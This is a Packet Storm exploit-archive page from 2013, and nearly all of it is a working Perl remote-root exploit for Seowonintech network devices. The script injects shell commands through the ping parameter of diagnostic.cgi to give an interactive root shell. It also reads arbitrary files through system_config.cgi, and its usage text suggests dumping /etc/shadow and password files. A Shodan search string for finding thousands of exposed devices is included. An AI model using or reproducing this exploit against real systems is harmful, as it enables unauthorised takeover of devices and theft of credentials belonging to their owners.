the original cloud security

Seowonintech Remote Root

Seowonintech Remote Root
Posted Jun 22, 2013
Authored by Todor Donev

Remote root exploit for all Seowonintech devices.

tags | exploit, remote, root
MD5 | e4ac56711a254ed2fa833d7cdbccb40b

Seowonintech Remote Root

Change Mirror Download
#!/usr/bin/perl
#
# [+] Seowonintech all device remote root exploit v2
# =====================================================
# author: | email:
# Todor Donev (latin) | todor dot donev
# Òîäîð Äîíåâ (cyrillic) | @googlemail.com
# =====================================================
# type: | platform: | description:
# remote | linux | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite
# colleagues and all my friends that support me.
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork:
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
# Stop Monsanto Stop Monsanto Stop Monsanto
#
# FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder
# who was sentenced to two years in jail by Nacka
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.

use LWP::Simple qw/$ua get/;
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
usg();
exit;
}
print "[+] Seowonintech all device remote root exploit\n";
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";
print "[+] Checking before attack..\n";
if($res->status_line != 200){
print "[+] diagnostic.cgi Status: ".$res->status_line."\n";
}else{
print "[o] Victim is ready for attack.\n";
print "[o] Status: ".$res->status_line."\n";
if(defined $res =~ m{selected>4</option>}sx){
print "[+] Connected to $ARGV[0]\n";
print "[+] The fight for the future Begins\n";
print "[+] Exploiting via remote command execution..\n";
print "[+] Permission granted, old friend.\n";
&rce;
}else{
print "[!] Warning: possible vulnerability.\n";
exit;
}
}
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";
if($res1->status_line != 200){
print "[+] system_config.cgi Status: ".$res1->status_line."\n";
exit;
}else{
print "[+] Trying to attack via remote file disclosure release.\n";
if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){
print "[+] Victim is ready for attack.\n";
print "[+] Connected to $ARGV[0]\n";
print "[o] Follow the white cat.\n";
print "[+] Exploiting via remote file dislocure..\n";
print "[+] You feeling lucky, Neo?\n";
&rfd;
}else{
print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";
exit;
}
}
sub rfd{
while(1){
print "# cat ";
chomp($file=<STDIN>);
if($file eq ""){ print "Enter full path to file!\n"; }
$bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
$data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
$data =~ s/Null/File not found!/gs;
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
print $1."\n";
}
}
}
sub rce{
while(1){
print "# ";
chomp($rce=<STDIN>);
$bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
$rce =~ s/\|/\;/;
if($rce eq ""){print "enter Linux command\n";}
if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}
$data=get($bug) || die "[-] Error: $!\n";
if (defined $data =~ m{(\s.*) Content-type:}sx){
$result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
$result =~ s/ loss\n//;
$result =~ s/ ms\n//;
print $result;
}
}
}
sub usg
{
print " [+] Seowonintech all device remote root exploit\n";
print " [!] by Todor Donev todor dot donev @ googlemail.com\n";
print " [?] usg: perl $0 <victim>\n";
print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";
print " [1] exmp xpl RCE: # uname -a :)\n";
print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close